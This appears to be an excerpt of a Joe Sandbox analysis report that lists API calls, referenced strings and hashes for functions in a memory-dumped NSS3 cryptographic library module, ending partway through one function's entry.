SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C7C5CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C7C5D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C7C5D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7C5D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C7C5E18
TlsGetValue.KERNEL32 ref: 6C7C5E5E
EnterCriticalSection.KERNEL32(?), ref: 6C7C5E72
PR_Unlock.NSS3(?), ref: 6C7C5E8B

Part of subcall function 6C7BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C7BF854
Part of subcall function 6C7BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C7BF868
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C7BF882
Part of subcall function 6C7BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C7BF889
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C7BF8A4
Part of subcall function 6C7BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C7BF8AB
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C7BF8C9
Part of subcall function 6C7BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C7BF8D0

Strings

tokens=[0x%x=<%s>], xrefs: 6C7C5D3D
d, xrefs: 6C7C5C36

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: 633a3b804a9a2f388aa4cdb5e303849aa84b6ea88bad96aac86310a7c9541978
Instruction ID: ee42caa12b3f8530a5b74bcd844434f429c33711b9bc3ae992bc939224a99d66
Opcode Fuzzy Hash: 633a3b804a9a2f388aa4cdb5e303849aa84b6ea88bad96aac86310a7c9541978
Instruction Fuzzy Hash: 0471C3B4B042039FEB509F25EE8976A3279AF4131DF140035D8099AB42EB37E915D7D3

Function 6C7B8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C7B9582), ref: 6C7B8F5B

Part of subcall function 6C7CBE30: SECOID_FindOID_Util.NSS3(6C78311B,00000000,?,6C78311B,?), ref: 6C7CBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C7B8F6A

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7B8FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C7B8FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C89D820,6C7B9576), ref: 6C7B8FF9
DER_GetInteger_Util.NSS3(?), ref: 6C7B901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C7B903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7B9062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C7B90A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C7B90CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C7B90F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7B912D
free.MOZGLUE(00000000), ref: 6C7B9136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C7B9145

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 41e1abcde59acf8510e88ab6da4e11d6fa06e667cd3f1dfbf6e13308ee14cabf
Instruction ID: fcd3cc7da95981baf9e0a37aeb1a48ee6cb67be424829861df0b0a52c8d15df9
Opcode Fuzzy Hash: 41e1abcde59acf8510e88ab6da4e11d6fa06e667cd3f1dfbf6e13308ee14cabf
Instruction Fuzzy Hash: F751D3B1A042019BE710CF28DE8579AB7F8EFA4358F054939E858A7741E731E949CBD2

Function 6C76AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C76AF47

Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390AB
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390C9
Part of subcall function 6C839090: EnterCriticalSection.KERNEL32 ref: 6C8390E5
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839116
Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C83913F

FreeLibrary.KERNEL32(?), ref: 6C76AF6D
free.MOZGLUE(?), ref: 6C76AFA4
free.MOZGLUE(?), ref: 6C76AFAA
PR_ExitMonitor.NSS3 ref: 6C76AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C76AFF5
PR_ExitMonitor.NSS3 ref: 6C76B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C76B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C76B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C76B03C

Strings

Unloaded library %s, xrefs: 6C76B023
%s decr => %d, xrefs: 6C76AFF0

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: ec1d55b486e61a68d2c94b9a238fcfbf982350191a2ce754796746c0bd1187ef
Instruction ID: c1cba8cf3b10c5ecde05c4ae6f1c2633f81e5b0bef7d25c923de4ca9ab5942c3
Opcode Fuzzy Hash: ec1d55b486e61a68d2c94b9a238fcfbf982350191a2ce754796746c0bd1187ef
Instruction Fuzzy Hash: A531F7B5A04121ABE7219F66EE44A96B7B5EF0532CB184535EC0597E01E732FC14CBE2

Function 6C7B6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C7B781D,00000000,6C7ABE2C,?,6C7B6B1D,?,?,?,?,00000000,00000000,6C7B781D), ref: 6C7B6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C7B781D,?,6C7ABE2C,?), ref: 6C7B6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C7B781D), ref: 6C7B6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C7B6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C7B6C96

Part of subcall function 6C761240: TlsGetValue.KERNEL32(00000040,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761267
Part of subcall function 6C761240: EnterCriticalSection.KERNEL32(?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C76127C
Part of subcall function 6C761240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761291
Part of subcall function 6C761240: PR_Unlock.NSS3(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C7612A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C7B6CAA

Strings

NSS_DEFAULT_DB_TYPE, xrefs: 6C7B6C91
extern:, xrefs: 6C7B6C7E
dbm, xrefs: 6C7B6CA4
dbm:, xrefs: 6C7B6C3A
sql:, xrefs: 6C7B6C52
rdb:, xrefs: 6C7B6C69

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 68a960b113e6145131ee08043887bc0dec23964fba281de8655198ee141e8fb6
Instruction ID: dae374c27dbca464164e0473118edb3b9445e5d0613a7214349113e8840df85c
Opcode Fuzzy Hash: 68a960b113e6145131ee08043887bc0dec23964fba281de8655198ee141e8fb6
Instruction Fuzzy Hash: 8D0144A170331537E9202B699F5AF56255C9B4215DF180831FF04F1B42EAB6F61581BD

Function 6C7C4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C7878F8), ref: 6C7C4E6D

Part of subcall function 6C7609E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C7606A2,00000000,?), ref: 6C7609F8
Part of subcall function 6C7609E0: malloc.MOZGLUE(0000001F), ref: 6C760A18
Part of subcall function 6C7609E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C760A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C7878F8), ref: 6C7C4ED9

Part of subcall function 6C7B5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C7B7703,?,00000000,00000000), ref: 6C7B5942
Part of subcall function 6C7B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C7B7703), ref: 6C7B5954
Part of subcall function 6C7B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7B596A
Part of subcall function 6C7B5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7B5984
Part of subcall function 6C7B5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C7B5999
Part of subcall function 6C7B5920: free.MOZGLUE(00000000), ref: 6C7B59BA
Part of subcall function 6C7B5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C7B59D3
Part of subcall function 6C7B5920: free.MOZGLUE(00000000), ref: 6C7B59F5
Part of subcall function 6C7B5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C7B5A0A
Part of subcall function 6C7B5920: free.MOZGLUE(00000000), ref: 6C7B5A2E
Part of subcall function 6C7B5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C7B5A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4EB3

Part of subcall function 6C7C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7C4EB8,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C484C
Part of subcall function 6C7C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7C4EB8,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C486D
Part of subcall function 6C7C4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C7C4EB8,?), ref: 6C7C4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4EC0

Part of subcall function 6C7C4470: TlsGetValue.KERNEL32(00000000,?,6C787296,00000000), ref: 6C7C4487
Part of subcall function 6C7C4470: EnterCriticalSection.KERNEL32(?,?,?,6C787296,00000000), ref: 6C7C44A0
Part of subcall function 6C7C4470: PR_Unlock.NSS3(?,?,?,?,6C787296,00000000), ref: 6C7C44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F8F
PK11_UpdateSlotAttribute.NSS3(?,6C89DCB0,00000000), ref: 6C7C4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C7C501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C506B

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: e4d7c0a6e0689da2153b6d0001601b66f639eab7598edc2899ca852f23aa3158
Instruction ID: 96159c11074bc7ac8fd8999a423216c73d5a7569caa75192aa8c0696a727f8dc
Opcode Fuzzy Hash: e4d7c0a6e0689da2153b6d0001601b66f639eab7598edc2899ca852f23aa3158
Instruction Fuzzy Hash: 9351F3B5A002029FDB119F35EE09AAB36B5EF0531DF190635EC0686A02FB32E954D7D3

Function 6C76ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76ACE2
malloc.MOZGLUE(00000001), ref: 6C76ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C76AD02
TlsGetValue.KERNEL32 ref: 6C76AD3C
calloc.MOZGLUE(00000001,?), ref: 6C76AD8C
PR_Unlock.NSS3 ref: 6C76ADC0
free.MOZGLUE(00000000), ref: 6C76AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C76AE58
free.MOZGLUE(00000000), ref: 6C76AE69
free.MOZGLUE(?), ref: 6C76AE78
PR_Unlock.NSS3 ref: 6C76AE8C
free.MOZGLUE(?), ref: 6C76AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C76AEC7

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 1a4f17c58db49ff0de7e7d8c36520e5a8adbc09c3150ec74db0dcc2d0dd2a843
Instruction ID: 6a76ad7d059a13cf57cb66f06a0dfab4a50b5c2c1803b36397d743e4a1a578ee
Opcode Fuzzy Hash: 1a4f17c58db49ff0de7e7d8c36520e5a8adbc09c3150ec74db0dcc2d0dd2a843
Instruction Fuzzy Hash: A2519FB4E011269BDF20DF9AEA4666E77B8AF0636DF140135EC05A7E01D331AE45CBD2

Function 6C7AADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C7AADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7AAE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AAE29

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7AAE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C7AAE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AAE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C7AAEA0

Strings

hSession = 0x%x, xrefs: 6C7AAE01, 6C7AAE11
C_MessageSignInit, xrefs: 6C7AADE1
hKey = 0x%x, xrefs: 6C7AAE62, 6C7AAE72
(CK_INVALID_HANDLE), xrefs: 6C7AAE1F, 6C7AAE80

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: ae2de8c6d417db34a33a1a59835cf7ce257a3228ea5f48cc761528fbbb105820
Instruction ID: 0742d17b1d459d417da00427c82ac6f754808acc1f9b6364fcb9b21b96bbb78b
Opcode Fuzzy Hash: ae2de8c6d417db34a33a1a59835cf7ce257a3228ea5f48cc761528fbbb105820
Instruction Fuzzy Hash: E231F531601154ABCB209F98DE8DFAA7779AB4632DF444935E8099BB02D734BC09CFD2

Function 6C7A9EE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageEncryptInit), ref: 6C7A9F06
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A9F37
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A9F49

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A9F5F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C7A9F98
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A9FAA
PR_LogPrint.NSS3(?,00000000), ref: 6C7A9FC0

Strings

hSession = 0x%x, xrefs: 6C7A9F21, 6C7A9F31
hKey = 0x%x, xrefs: 6C7A9F82, 6C7A9F92
C_MessageEncryptInit, xrefs: 6C7A9F01
(CK_INVALID_HANDLE), xrefs: 6C7A9F3F, 6C7A9FA0

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptInit
API String ID: 332880674-1139731676
Opcode ID: f85ff3fa4d6c4c7d133a083021737cd1178e679040ffd8c68361f172f7be37df
Instruction ID: 3f47e849e4b9f74c91c90955de7f580dc58a56bef482273a5e928441230912e1
Opcode Fuzzy Hash: f85ff3fa4d6c4c7d133a083021737cd1178e679040ffd8c68361f172f7be37df
Instruction Fuzzy Hash: 6531F731602254ABCB209F98DE8CFAE7775AB4A31DF044835E4095BB42D735BC19CBD1

Function 6C844C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C844CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C844CFD
sqlite3_value_text16.NSS3(?), ref: 6C844D44

Strings

out of memory, xrefs: 6C844C78, 6C844C9E
another row available, xrefs: 6C844D20
no more rows available, xrefs: 6C844D2E
unknown error, xrefs: 6C844D56
invalid, xrefs: 6C844CF1
bad parameter or other API misuse, xrefs: 6C844D05
API call with %s database connection pointer, xrefs: 6C844CF6
abort due to ROLLBACK, xrefs: 6C844D27, 6C844D33

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: ff81e8d79d71d727696c4c177e522089026441cb52a8b3210456c1e53bcbda43
Instruction ID: 988e4d9a09574136d848f99557f2a2e7bc58048e6193edd759e818f707393044
Opcode Fuzzy Hash: ff81e8d79d71d727696c4c177e522089026441cb52a8b3210456c1e53bcbda43
Instruction Fuzzy Hash: A2317772A0491CA7E7380E249B047A5B32177C231AF5ACD36D8245BE14CB74AC16C3E2

Function 6C7A2DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C7A2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A2E33

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C7A2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C7A2E81

Strings

hSession = 0x%x, xrefs: 6C7A2E0E, 6C7A2E1E
C_InitPIN, xrefs: 6C7A2DF1
pPin = 0x%p, xrefs: 6C7A2E63
ulPinLen = %d, xrefs: 6C7A2E7C
(CK_INVALID_HANDLE), xrefs: 6C7A2E2C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: 5a10260c4cc573ba40c7a2e9f8475cd169a25cd5fa1404b8a4fc778922809f55
Instruction ID: 55ca63f932814b56694837c9ab517b0352302d8f86d8c0a526fc939bec17de72
Opcode Fuzzy Hash: 5a10260c4cc573ba40c7a2e9f8475cd169a25cd5fa1404b8a4fc778922809f55
